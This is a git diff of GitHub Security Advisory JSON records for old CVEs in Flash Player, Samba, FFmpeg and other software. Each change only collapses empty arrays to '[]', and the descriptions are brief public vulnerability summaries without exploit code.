a/advisories/unreviewed/2022/05/GHSA-9c62-wq8x-6267/GHSA-9c62-wq8x-6267.json b/advisories/unreviewed/2022/05/GHSA-9c62-wq8x-6267/GHSA-9c62-wq8x-6267.json index ee668dc1013..cac5195e50c 100644 --- a/advisories/unreviewed/2022/05/GHSA-9c62-wq8x-6267/GHSA-9c62-wq8x-6267.json +++ b/advisories/unreviewed/2022/05/GHSA-9c62-wq8x-6267/GHSA-9c62-wq8x-6267.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9cwx-7vc4-7q5f/GHSA-9cwx-7vc4-7q5f.json b/advisories/unreviewed/2022/05/GHSA-9cwx-7vc4-7q5f/GHSA-9cwx-7vc4-7q5f.json index 54619b1aeca..6d078d1cab3 100644 --- a/advisories/unreviewed/2022/05/GHSA-9cwx-7vc4-7q5f/GHSA-9cwx-7vc4-7q5f.json +++ b/advisories/unreviewed/2022/05/GHSA-9cwx-7vc4-7q5f/GHSA-9cwx-7vc4-7q5f.json @@ -7,12 +7,8 @@ "CVE-2010-3227" ], "details": "Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka \"Windows MFC Document Title Updating Buffer Overflow Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9f23-98x6-49jh/GHSA-9f23-98x6-49jh.json b/advisories/unreviewed/2022/05/GHSA-9f23-98x6-49jh/GHSA-9f23-98x6-49jh.json index 35bde10267f..91c99e685d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f23-98x6-49jh/GHSA-9f23-98x6-49jh.json +++ b/advisories/unreviewed/2022/05/GHSA-9f23-98x6-49jh/GHSA-9f23-98x6-49jh.json @@ -7,12 +7,8 @@ "CVE-2011-0573" ], "details": "Adobe Flash Player before 10.2.152.26 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0559, CVE-2011-0560, CVE-2011-0561, CVE-2011-0571, CVE-2011-0572, CVE-2011-0574, CVE-2011-0578, CVE-2011-0607, and CVE-2011-0608.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9f38-jj5w-25cg/GHSA-9f38-jj5w-25cg.json b/advisories/unreviewed/2022/05/GHSA-9f38-jj5w-25cg/GHSA-9f38-jj5w-25cg.json index ea809d7a531..b108b5ff5b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f38-jj5w-25cg/GHSA-9f38-jj5w-25cg.json +++ b/advisories/unreviewed/2022/05/GHSA-9f38-jj5w-25cg/GHSA-9f38-jj5w-25cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9h64-hvgq-263q/GHSA-9h64-hvgq-263q.json b/advisories/unreviewed/2022/05/GHSA-9h64-hvgq-263q/GHSA-9h64-hvgq-263q.json index a9048117d2c..86c998f029f 100644 --- a/advisories/unreviewed/2022/05/GHSA-9h64-hvgq-263q/GHSA-9h64-hvgq-263q.json +++ b/advisories/unreviewed/2022/05/GHSA-9h64-hvgq-263q/GHSA-9h64-hvgq-263q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9hgq-q6vw-9852/GHSA-9hgq-q6vw-9852.json b/advisories/unreviewed/2022/05/GHSA-9hgq-q6vw-9852/GHSA-9hgq-q6vw-9852.json index fe0f944bcc3..5335fe65763 100644 --- a/advisories/unreviewed/2022/05/GHSA-9hgq-q6vw-9852/GHSA-9hgq-q6vw-9852.json +++ b/advisories/unreviewed/2022/05/GHSA-9hgq-q6vw-9852/GHSA-9hgq-q6vw-9852.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9m6g-cc2f-9f4h/GHSA-9m6g-cc2f-9f4h.json b/advisories/unreviewed/2022/05/GHSA-9m6g-cc2f-9f4h/GHSA-9m6g-cc2f-9f4h.json index 643bcc1c6ca..f33f55f31d4 100644 --- a/advisories/unreviewed/2022/05/GHSA-9m6g-cc2f-9f4h/GHSA-9m6g-cc2f-9f4h.json +++ b/advisories/unreviewed/2022/05/GHSA-9m6g-cc2f-9f4h/GHSA-9m6g-cc2f-9f4h.json @@ -7,12 +7,8 @@ "CVE-2010-1728" ], "details": "Opera before 10.53 on Windows and Mac OS X does not properly handle a series of document modifications that occur asynchronously, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via JavaScript that writes sequences in an infinite loop, leading to attempted use of uninitialized memory. NOTE: this might overlap CVE-2006-6955.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9mj8-c9h5-8r5p/GHSA-9mj8-c9h5-8r5p.json b/advisories/unreviewed/2022/05/GHSA-9mj8-c9h5-8r5p/GHSA-9mj8-c9h5-8r5p.json index d96661324de..ae1814caf7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-9mj8-c9h5-8r5p/GHSA-9mj8-c9h5-8r5p.json +++ b/advisories/unreviewed/2022/05/GHSA-9mj8-c9h5-8r5p/GHSA-9mj8-c9h5-8r5p.json @@ -7,12 +7,8 @@ "CVE-2011-2430" ], "details": "Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via crafted streaming media, related to a \"logic error vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9pcf-42mm-2j64/GHSA-9pcf-42mm-2j64.json b/advisories/unreviewed/2022/05/GHSA-9pcf-42mm-2j64/GHSA-9pcf-42mm-2j64.json index c1f40a1df86..e5c030a597c 100644 --- a/advisories/unreviewed/2022/05/GHSA-9pcf-42mm-2j64/GHSA-9pcf-42mm-2j64.json +++ b/advisories/unreviewed/2022/05/GHSA-9pcf-42mm-2j64/GHSA-9pcf-42mm-2j64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9pmq-32g5-2h85/GHSA-9pmq-32g5-2h85.json b/advisories/unreviewed/2022/05/GHSA-9pmq-32g5-2h85/GHSA-9pmq-32g5-2h85.json index 0b74b482ddf..add0000f75e 100644 --- a/advisories/unreviewed/2022/05/GHSA-9pmq-32g5-2h85/GHSA-9pmq-32g5-2h85.json +++ b/advisories/unreviewed/2022/05/GHSA-9pmq-32g5-2h85/GHSA-9pmq-32g5-2h85.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9q9v-wxmj-6xqx/GHSA-9q9v-wxmj-6xqx.json b/advisories/unreviewed/2022/05/GHSA-9q9v-wxmj-6xqx/GHSA-9q9v-wxmj-6xqx.json index 505fcf4db2c..56a52aaac5d 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q9v-wxmj-6xqx/GHSA-9q9v-wxmj-6xqx.json +++ b/advisories/unreviewed/2022/05/GHSA-9q9v-wxmj-6xqx/GHSA-9q9v-wxmj-6xqx.json @@ -7,12 +7,8 @@ "CVE-2010-2179" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, when Firefox or Chrome is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to URL parsing.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9qf3-m5jr-899m/GHSA-9qf3-m5jr-899m.json b/advisories/unreviewed/2022/05/GHSA-9qf3-m5jr-899m/GHSA-9qf3-m5jr-899m.json index c30eb56871f..dc83dad5cfa 100644 --- a/advisories/unreviewed/2022/05/GHSA-9qf3-m5jr-899m/GHSA-9qf3-m5jr-899m.json +++ b/advisories/unreviewed/2022/05/GHSA-9qf3-m5jr-899m/GHSA-9qf3-m5jr-899m.json @@ -7,12 +7,8 @@ "CVE-2010-2185" ], "details": "Buffer overflow in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9qgm-4jf7-rwpx/GHSA-9qgm-4jf7-rwpx.json b/advisories/unreviewed/2022/05/GHSA-9qgm-4jf7-rwpx/GHSA-9qgm-4jf7-rwpx.json index 63ca919b603..1d746095656 100644 --- a/advisories/unreviewed/2022/05/GHSA-9qgm-4jf7-rwpx/GHSA-9qgm-4jf7-rwpx.json +++ b/advisories/unreviewed/2022/05/GHSA-9qgm-4jf7-rwpx/GHSA-9qgm-4jf7-rwpx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9qr3-c2g6-3m4c/GHSA-9qr3-c2g6-3m4c.json b/advisories/unreviewed/2022/05/GHSA-9qr3-c2g6-3m4c/GHSA-9qr3-c2g6-3m4c.json index 638052c3635..d3c150ea05d 100644 --- a/advisories/unreviewed/2022/05/GHSA-9qr3-c2g6-3m4c/GHSA-9qr3-c2g6-3m4c.json +++ b/advisories/unreviewed/2022/05/GHSA-9qr3-c2g6-3m4c/GHSA-9qr3-c2g6-3m4c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9rjc-6qv8-rh92/GHSA-9rjc-6qv8-rh92.json b/advisories/unreviewed/2022/05/GHSA-9rjc-6qv8-rh92/GHSA-9rjc-6qv8-rh92.json index 51a478b708b..e4ba08a79a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-9rjc-6qv8-rh92/GHSA-9rjc-6qv8-rh92.json +++ b/advisories/unreviewed/2022/05/GHSA-9rjc-6qv8-rh92/GHSA-9rjc-6qv8-rh92.json @@ -7,12 +7,8 @@ "CVE-2012-0756" ], "details": "Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0755.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9rx7-vx78-rj38/GHSA-9rx7-vx78-rj38.json b/advisories/unreviewed/2022/05/GHSA-9rx7-vx78-rj38/GHSA-9rx7-vx78-rj38.json index ede3d958514..75b34d96600 100644 --- a/advisories/unreviewed/2022/05/GHSA-9rx7-vx78-rj38/GHSA-9rx7-vx78-rj38.json +++ b/advisories/unreviewed/2022/05/GHSA-9rx7-vx78-rj38/GHSA-9rx7-vx78-rj38.json @@ -7,12 +7,8 @@ "CVE-2011-0563" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0589 and CVE-2011-0606.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9w2v-pc9r-gpj4/GHSA-9w2v-pc9r-gpj4.json b/advisories/unreviewed/2022/05/GHSA-9w2v-pc9r-gpj4/GHSA-9w2v-pc9r-gpj4.json index d66d2c55aa4..4899f43b149 100644 --- a/advisories/unreviewed/2022/05/GHSA-9w2v-pc9r-gpj4/GHSA-9w2v-pc9r-gpj4.json +++ b/advisories/unreviewed/2022/05/GHSA-9w2v-pc9r-gpj4/GHSA-9w2v-pc9r-gpj4.json @@ -7,12 +7,8 @@ "CVE-2012-1182" ], "details": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -128,9 +124,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9xj4-w6g9-mg72/GHSA-9xj4-w6g9-mg72.json b/advisories/unreviewed/2022/05/GHSA-9xj4-w6g9-mg72/GHSA-9xj4-w6g9-mg72.json index da43d3e7432..8628e8a4599 100644 --- a/advisories/unreviewed/2022/05/GHSA-9xj4-w6g9-mg72/GHSA-9xj4-w6g9-mg72.json +++ b/advisories/unreviewed/2022/05/GHSA-9xj4-w6g9-mg72/GHSA-9xj4-w6g9-mg72.json @@ -7,12 +7,8 @@ "CVE-2010-2169" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allow attackers to cause a denial of service (pointer memory corruption) or possibly execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9xmm-cpf8-rgmx/GHSA-9xmm-cpf8-rgmx.json b/advisories/unreviewed/2022/05/GHSA-9xmm-cpf8-rgmx/GHSA-9xmm-cpf8-rgmx.json index af4aec37c88..76b640e6c5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-9xmm-cpf8-rgmx/GHSA-9xmm-cpf8-rgmx.json +++ b/advisories/unreviewed/2022/05/GHSA-9xmm-cpf8-rgmx/GHSA-9xmm-cpf8-rgmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9xqr-g3w9-82pj/GHSA-9xqr-g3w9-82pj.json b/advisories/unreviewed/2022/05/GHSA-9xqr-g3w9-82pj/GHSA-9xqr-g3w9-82pj.json index 85fb419b9f9..6f0598917a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-9xqr-g3w9-82pj/GHSA-9xqr-g3w9-82pj.json +++ b/advisories/unreviewed/2022/05/GHSA-9xqr-g3w9-82pj/GHSA-9xqr-g3w9-82pj.json @@ -7,12 +7,8 @@ "CVE-2011-2694" ], "details": "Cross-site scripting (XSS) vulnerability in the chg_passwd function in web/swat.c in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allows remote authenticated administrators to inject arbitrary web script or HTML via the username parameter to the passwd program (aka the user field to the Change Password page).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c2ww-38j4-6r8m/GHSA-c2ww-38j4-6r8m.json b/advisories/unreviewed/2022/05/GHSA-c2ww-38j4-6r8m/GHSA-c2ww-38j4-6r8m.json index 3bea56ebc20..d9018e4d6dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2ww-38j4-6r8m/GHSA-c2ww-38j4-6r8m.json +++ b/advisories/unreviewed/2022/05/GHSA-c2ww-38j4-6r8m/GHSA-c2ww-38j4-6r8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c3x7-7hfx-3cq6/GHSA-c3x7-7hfx-3cq6.json b/advisories/unreviewed/2022/05/GHSA-c3x7-7hfx-3cq6/GHSA-c3x7-7hfx-3cq6.json index 59f727c77ed..e717646ea7f 100644 --- a/advisories/unreviewed/2022/05/GHSA-c3x7-7hfx-3cq6/GHSA-c3x7-7hfx-3cq6.json +++ b/advisories/unreviewed/2022/05/GHSA-c3x7-7hfx-3cq6/GHSA-c3x7-7hfx-3cq6.json @@ -7,12 +7,8 @@ "CVE-2013-2495" ], "details": "The iff_read_header function in iff.c in libavformat in FFmpeg through 1.1.3 does not properly handle data sizes for Interchange File Format (IFF) data during operations involving a CMAP chunk or a video codec, which allows remote attackers to cause a denial of service (integer overflow, out-of-bounds array access, and application crash) or possibly have unspecified other impact via a crafted header.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c4j5-hwcp-h2qq/GHSA-c4j5-hwcp-h2qq.json b/advisories/unreviewed/2022/05/GHSA-c4j5-hwcp-h2qq/GHSA-c4j5-hwcp-h2qq.json index e8ae47819fb..4282d0c5e03 100644 --- a/advisories/unreviewed/2022/05/GHSA-c4j5-hwcp-h2qq/GHSA-c4j5-hwcp-h2qq.json +++ b/advisories/unreviewed/2022/05/GHSA-c4j5-hwcp-h2qq/GHSA-c4j5-hwcp-h2qq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c4qf-w393-rfcw/GHSA-c4qf-w393-rfcw.json b/advisories/unreviewed/2022/05/GHSA-c4qf-w393-rfcw/GHSA-c4qf-w393-rfcw.json index ecc4f0b5a96..1fa6b377152 100644 --- a/advisories/unreviewed/2022/05/GHSA-c4qf-w393-rfcw/GHSA-c4qf-w393-rfcw.json +++ b/advisories/unreviewed/2022/05/GHSA-c4qf-w393-rfcw/GHSA-c4qf-w393-rfcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c552-3679-vwvm/GHSA-c552-3679-vwvm.json b/advisories/unreviewed/2022/05/GHSA-c552-3679-vwvm/GHSA-c552-3679-vwvm.json index 6a0a14d21fc..7876130cc2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-c552-3679-vwvm/GHSA-c552-3679-vwvm.json +++ b/advisories/unreviewed/2022/05/GHSA-c552-3679-vwvm/GHSA-c552-3679-vwvm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c5fx-333r-cgw4/GHSA-c5fx-333r-cgw4.json b/advisories/unreviewed/2022/05/GHSA-c5fx-333r-cgw4/GHSA-c5fx-333r-cgw4.json index 0fb56e09ad4..b7ca686a92b 100644 --- a/advisories/unreviewed/2022/05/GHSA-c5fx-333r-cgw4/GHSA-c5fx-333r-cgw4.json +++ b/advisories/unreviewed/2022/05/GHSA-c5fx-333r-cgw4/GHSA-c5fx-333r-cgw4.json @@ -7,12 +7,8 @@ "CVE-2015-3237" ], "details": "The smb_request_state function in cURL and libcurl 7.40.0 through 7.42.1 allows remote SMB servers to obtain sensitive information from memory or cause a denial of service (out-of-bounds read and crash) via crafted length and offset values.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c62g-qqcc-wh6p/GHSA-c62g-qqcc-wh6p.json b/advisories/unreviewed/2022/05/GHSA-c62g-qqcc-wh6p/GHSA-c62g-qqcc-wh6p.json index 20c7992d657..fdeb4d9e846 100644 --- a/advisories/unreviewed/2022/05/GHSA-c62g-qqcc-wh6p/GHSA-c62g-qqcc-wh6p.json +++ b/advisories/unreviewed/2022/05/GHSA-c62g-qqcc-wh6p/GHSA-c62g-qqcc-wh6p.json @@ -7,12 +7,8 @@ "CVE-2008-5395" ], "details": "The parisc_show_stack function in arch/parisc/kernel/traps.c in the Linux kernel before 2.6.28-rc7 on PA-RISC allows local users to cause a denial of service (system crash) via vectors associated with an attempt to unwind a stack that contains userspace addresses.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c694-qrv8-m3rq/GHSA-c694-qrv8-m3rq.json b/advisories/unreviewed/2022/05/GHSA-c694-qrv8-m3rq/GHSA-c694-qrv8-m3rq.json index 81a090cd620..2e5ce4399c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-c694-qrv8-m3rq/GHSA-c694-qrv8-m3rq.json +++ b/advisories/unreviewed/2022/05/GHSA-c694-qrv8-m3rq/GHSA-c694-qrv8-m3rq.json @@ -7,12 +7,8 @@ "CVE-2012-6354" ], "details": "The management GUI on the IBM SAN Volume Controller and Storwize V7000 6.x before 6.4.1.3 allows remote attackers to bypass authentication and obtain superuser access via IP packets.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c9g5-rm47-4j7p/GHSA-c9g5-rm47-4j7p.json b/advisories/unreviewed/2022/05/GHSA-c9g5-rm47-4j7p/GHSA-c9g5-rm47-4j7p.json index f434d36bd8c..798b86afc5c 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9g5-rm47-4j7p/GHSA-c9g5-rm47-4j7p.json +++ b/advisories/unreviewed/2022/05/GHSA-c9g5-rm47-4j7p/GHSA-c9g5-rm47-4j7p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c9gh-9qxq-gm83/GHSA-c9gh-9qxq-gm83.json b/advisories/unreviewed/2022/05/GHSA-c9gh-9qxq-gm83/GHSA-c9gh-9qxq-gm83.json index ef84cba46d5..a670eab2f0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9gh-9qxq-gm83/GHSA-c9gh-9qxq-gm83.json +++ b/advisories/unreviewed/2022/05/GHSA-c9gh-9qxq-gm83/GHSA-c9gh-9qxq-gm83.json @@ -7,12 +7,8 @@ "CVE-2012-2797" ], "details": "Unspecified vulnerability in the decode_frame_mp3on4 function in libavcodec/mpegaudiodec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.5 has unknown impact and attack vectors related to a calculation that prevents a frame from being \"large enough.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c9h2-cw5f-g747/GHSA-c9h2-cw5f-g747.json b/advisories/unreviewed/2022/05/GHSA-c9h2-cw5f-g747/GHSA-c9h2-cw5f-g747.json index 4ec26973639..9f0d6e3c595 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9h2-cw5f-g747/GHSA-c9h2-cw5f-g747.json +++ b/advisories/unreviewed/2022/05/GHSA-c9h2-cw5f-g747/GHSA-c9h2-cw5f-g747.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ccwp-q88v-h469/GHSA-ccwp-q88v-h469.json b/advisories/unreviewed/2022/05/GHSA-ccwp-q88v-h469/GHSA-ccwp-q88v-h469.json index 57c620e2e26..06d67c760fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-ccwp-q88v-h469/GHSA-ccwp-q88v-h469.json +++ b/advisories/unreviewed/2022/05/GHSA-ccwp-q88v-h469/GHSA-ccwp-q88v-h469.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cf86-cfg7-g4j9/GHSA-cf86-cfg7-g4j9.json b/advisories/unreviewed/2022/05/GHSA-cf86-cfg7-g4j9/GHSA-cf86-cfg7-g4j9.json index d91926b29ad..7ed89b61d1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cf86-cfg7-g4j9/GHSA-cf86-cfg7-g4j9.json +++ b/advisories/unreviewed/2022/05/GHSA-cf86-cfg7-g4j9/GHSA-cf86-cfg7-g4j9.json @@ -7,12 +7,8 @@ "CVE-2012-2800" ], "details": "Unspecified vulnerability in the ff_ivi_process_empty_tile function in libavcodec/ivi_common.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors in which the \"tile size ... mismatches parameters\" and triggers \"writing into a too small array.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cfpx-jvfr-xh8w/GHSA-cfpx-jvfr-xh8w.json b/advisories/unreviewed/2022/05/GHSA-cfpx-jvfr-xh8w/GHSA-cfpx-jvfr-xh8w.json index 67688254028..048cb503855 100644 --- a/advisories/unreviewed/2022/05/GHSA-cfpx-jvfr-xh8w/GHSA-cfpx-jvfr-xh8w.json +++ b/advisories/unreviewed/2022/05/GHSA-cfpx-jvfr-xh8w/GHSA-cfpx-jvfr-xh8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ch57-5x8m-hfx2/GHSA-ch57-5x8m-hfx2.json b/advisories/unreviewed/2022/05/GHSA-ch57-5x8m-hfx2/GHSA-ch57-5x8m-hfx2.json index 0b10e4e3295..0508e9e27ab 100644 --- a/advisories/unreviewed/2022/05/GHSA-ch57-5x8m-hfx2/GHSA-ch57-5x8m-hfx2.json +++ b/advisories/unreviewed/2022/05/GHSA-ch57-5x8m-hfx2/GHSA-ch57-5x8m-hfx2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cj48-gr7g-jvm7/GHSA-cj48-gr7g-jvm7.json b/advisories/unreviewed/2022/05/GHSA-cj48-gr7g-jvm7/GHSA-cj48-gr7g-jvm7.json index 63a619bfe13..bcca5817e9d 100644 --- a/advisories/unreviewed/2022/05/GHSA-cj48-gr7g-jvm7/GHSA-cj48-gr7g-jvm7.json +++ 